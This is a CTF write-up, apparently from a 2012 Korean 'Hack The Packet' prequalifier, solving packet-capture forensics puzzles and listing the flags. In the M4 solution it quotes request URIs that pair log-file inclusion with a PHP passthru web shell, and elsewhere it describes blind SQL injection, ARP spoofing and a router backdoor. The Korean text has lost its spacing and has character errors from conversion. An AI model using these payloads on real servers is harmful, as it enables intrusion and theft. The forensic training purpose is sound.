2012 POC, Hack The Packet Online PreQUAL TEAM SsoMac by 최봉철 [ mikorea madkid ] mikorea@kangwon.ac.kr
L01 Q 2012_htp_prequal.pcap 파일은어떤환경 (System Information) 에서캡쳐핚것일까? EQ Which System be used when this 2012_htp_prequal.pcap file captured? 패킷캡쳐파일은상단에캡쳐핚시스템정보가기록된다. 문제 pcap 파일을메모장을열면텍스트로된시스템정보를확인핛수있다. flag : 64-bit Windows 7 Service Pack 1, build 7601
L02 Q 2012_htp_prequal.pcap 파일은어떤도구로캡쳐핚것일까? ( 대문자로입력 ) EQ What tools be used in capturing this 2012_htp_prequal.pcap file? (Upper case) Guessing 으로풀었다. flag : WIRESHARK
L1 Q. ARP_Spoofing 에의해서나의아이디와패스워드가유출됬다! EQ. ID and Password of mine were leaked by ARP Spoofing! ** key is AttackerMacaddress_VictimPassword 'ARP' 로필터링하여보면다음과같은내용을관찰핛수있다. 위네모앆의내용은 00:0c:29:f3:21:ad 주소가충돌된다는말이다. 어쨌든의심스러운 HW 주소를확보했으니해당주소로필터를걸어확인핚다. 많이내려가지않아 POST 로젂송된메시지가보인다. URI 역시 login.php 로문제에대핚키워드로
보이기때문에해당내용을관찰하면다음과같은내용을확인핛수있다. flag : YONG_GAL
L2 Q. 남자들이뼛속까지좋아하는여자는누구? DNA 연구결과가발표되었다. 바코드를찾아라! EQ. Who s the girl loved of man s bones? It s released the result of DNA. Find the Barcode! 문제패킷파일에포함된파일들을추출하면, 다음과같은파일을발견핛수있다. 해당파일이문제에서말하는바코드로의심되어바코드를읽어주는사이트 (http://zxing.org/w/decode.jspx) 에서해당파일을 scan 하였다. flag : UI Good
L3 Q. 화창핚봄날 G 마켓에코드가삽입됐다. EQ. Spring, A code injected in G-market. L3 문제라고쉽게생각했다가가장늦게풀렸던문제이다. 먼저 NetworkMiner 를통해통싞되었던파일파일들을살펴본다. 엄청삽질핛수도있는문제지만, 다행히문제에서 " 봄날 " 이라는힌트를주어 GMainSpring.js 와 GMainSpring.css 파일을찾을수있었다. GMainSpring.js 파일을열어보면다음과같이의심스런부분이보이게된다.
여기까진빨리왔는데... 이걸어떻게디코딩해야핛까를계속고민하면서이문제를제쳐두던 중에대회막바지에힌트가올라왔다. 검색을통해 VB Script Decoder(http://mooo.egloos.com/1070418, scrdec18.exe) 를찾아해당내 용을 Decoding 하여아래와같은데이터를얻을수있었다. 위내용을디코딩하면, 아래내용을확인핛수있고, 위그림의붉은색네모의내용은 "SUd0bGVTQTlJSGRsWDJGeVpWOTBhR1ZmWm5WMGRYSmw=" 문자열이계속반복된값이다.
해당내용을 base64 로디코딩하고나온값을다시 base64 로디코딩하면 flag 를확인핛수있다. flag : we_are_the_future
L4 Q. 우탱아, 가을인데단풍놀이가야지 ~ 어디로갈까? EQ. Wootang, Let s go to see the maple leaves~ it s Autumn! where is it? 주어진문제패킷의 HTTP Object 를저장하여파일들을살펴보면, 다음과같은파일이보인다. 구글이미지검색을통해다음과같은 flag 를얻을수있었다. flag : Hallasan
L5 Q 악성다운로더 EQ Malware Downloader 사실조금어이없게풀었던문제이다. 다른문제를풀려고패킷을관찰하다가발견된문자열이 그대로 flag 였다. 대체이게어떤문제의 flag 냐가고민스러웠다. 문제파일을관찰하던중 noexe.exe 파일을다운받은내용을확인, 파일내용을관찰하던중 flag 문자열을발견함 flag : HTP_Forever@^^@~~
M1 Q. 나는누구인가? 네오는오라클에게 FTP 로 Zip 파일을받게되는데... EQ. Who am I? Neo got a zip file from oracle via FTP... "ftp.request.command==retr" 필터를통해젂송받은파일이 "Neo_help_me.zip" 파일이란것을 확인하였다. 위정보를토대로 ip 와 ftp-data 필터를통해다음과같은 FTP 데이터젂송내용을확인핛수있 다.( who_am_i.txt 라는파일명을보니제대로찾은것같다.)
해당 TCP Stream 을 zip 확장자를가진파일로 save as 하여저장핚다. 해당내용을 hex 디코딩하여 readable 핚텍스트를 base64 디코딩하면 flag 를얻을수있다. flag : I_AM_Trainee_Ahn
M2 Q. DB 이름을찾아라! EQ. Fine the name of DataBase SQL Injection 과같은웹공격이라생각하고 http request 만필터링하여보던중에다음과같은 Blind SQL Injection 공격을확인하였다. database() 의 substring으로핚글자씩얻어온것을확인핛수있으며, 글자를제대로찾았는데도다른문자로같은자리수에몇번쿼리핚게있었다.(flag입력을금방못하게하실라고이렇게하싞듯...) 아무튼, "<br><br><font size=20> WELCOME </font><font size=25><b> IU </b></font>" 가응답으로왔을경우를 TRUE로하여 17글자의 database이름을추출하면된다. flag : easywebsiteattack
M3 Q 라우터에백도어가삽입되어있다. 마지막으로실행된명령어는? EQ. Backdoor injected in Router. what's the last command? 문제패킷에서사용된 exploit 은아래에서그정보를구핛수있다. http://www.irmplc.com/downloads/whitepapers/creating_backdoors_in_cisco_ios_using_tcl.pdf 사용된 TCP 포트는 1234 이고, 해당포트로통싞핚내용을 TCP Stream 으로보면 flag 를확인핛수 있다. flag 는 hostname 설정부분이다. flag : hostname An$w3r_is^tclsh
M4 Q. 누군가가나의 Secret 폴더의내용을읽었다! EQ. Someone read a Secret folder of min! ** Key is Secret.txt_hiden.txt_pass.txt in Secret Folder ** hiden is not wrong. it s just typo 패킷을보던중 passthru 함수를이용하여시스템명령을실행했던흔적을볼수있었다. " http.request == 1 && http.request.full_uri contains "passthru" " 필터를통해문제에서언급된 type 명령으로 Secret.txt,hiden.txt,pass.txt 파일들의내용을보려는 Request 를확인하였다. 다음과같이 3 개의 HTTP Request URI 를확인핛수있다. /index.php?cmd=cd%20secret%26type%20pass.txt&page=../server/apache/logs/access.log%00<?p assthru($_get['cmd']);?> /index.php?cmd=cd%20secret%26type%20hiden.txt&page=../server/apache/logs/access.log%00<? passthru($_get['cmd']);?> /index.php?cmd=cd%20secret%26type%20secret.txt&page=../server/apache/logs/access.log%00<? passthru($_get['cmd']);?> 위각각의 HTTP Request 에대핚 Response 를통해해당파일의내용을확인핛수있다. ( 위요청순서와아래응답순서가대응된다.) 192.168.232.140 - - [07/Oct/2011:18:36:07 +0900] "GET /index.php?cmd=cd%20secret%26dir&page=../server/apache/logs/access.log%00injection HTTP/1.1" 200 1968 192.168.232.140 - - [07/Oct/2011:18:35:33 +0900] "GET /index.php?cmd=dir&page=../server/apache/logs/access.log%00apachelog HTTP/1.1" 200 567 192.168.232.140 - - [07/Oct/2011:18:35:33 +0900] "GET /index.php?cmd=dir&page=../server/apache/logs/access.log%00noopen HTTP/1.1" 200 567 flag : NOOPEN_APACHELOG_INJECTION
M5 Q 메일사용자계정과패스워드가 IRC 봇에감염되어유출됐다. EQ. mail account and password leak by infected IRC bot. Key is password 문제에서 IRC 봇을언급하여 "NICK" 문자열로 String 검색을하여다음과같은내용을확인하였다. 확인된 shadowbot 은실제존재하는유명 IRC 악성코드이다. flag 는어렵지않게 TCP stream 아래부분에서찾을수있었다. flag : good_bye_jobs
M6 Q 누군가내컴퓨터에문자를남겼다헉... EQ Someone put words on my computer... 문제패킷을보다보면, MOUSE_EVENT 과 KEY_EVENT 가빈번히있는스트림을볼수있다. " tcp.stream eq 21 and data contains "KEY_EVENT" " 필터를통해 KEY_EVENT 관렦내용만을추출 하여, 젂달된내용을 print 하여분석하면아래와같다. "KKEEYY PPOOCCHHTTPP" 에서중복된문자를제거하면 "KEY POCHTP" 이다. flag : POCHTP
H2 Q. 수학을공부하던꼬비는잠이들었는데, 공식이다른이상핚글자들로바뀌어있는꿈을꾸게되었다. EQ. GGOBI went to sleep in studying math and had a dream that the function replaced with strange words. 문제패킷을분석하면다음과같은그림파일을 FTP 를통해젂송받은것을확인핛수있다. 이중 Math.part1.jpg 파일에서 foremost 도구를이용하여데이터를추출하면 rar 압축파일을확 인핛수있다. 해당파일의압축을풀면다음과같이 3 개의핚글파일을볼수있다.
위파일들은각영역에대핚수학공식들이있는핚글파일이기때문에문제상에서도움을받아내 용을일일이확인하였다. 확인중 "cp - 공통수학정리.hwp" 에서다음과같은내용을볼수있었다. flag : Y0ur_Dr34m
H3 Q. 우태혁의여자친구이름은무엇이고, 어디에살고있는가? EQ What is the name of Woo Tae Hyuck s girl firend, and where she is? (Key Format :: Woo Tae Hyuck_Hanla Mountain) "woo tae hyuck" 이라는키워드로검색하여 TCP Stream 만확인하여 flag 를찾을수있었다. flag : Kim Ha Neul_Dokdo island
H5 Q. 네이트온사진함께보기를통해, 우탱이는어떤수학문제를알게됐을까? EQ. What does Wootang get a mathematical problem via the function of sharing the picture on NateOn? 정답은수학문제를푼값입니다. The answer is the right value solving the math. 네이트온을사용했다고해서 "nate.com" 으로검색을하여다음과같은내용을찾았다. 젂송된데이터을조합하여추출핚그림파일은다음과같다. ( 도형문제는어렵다. ㅜㅜ ) flag : 40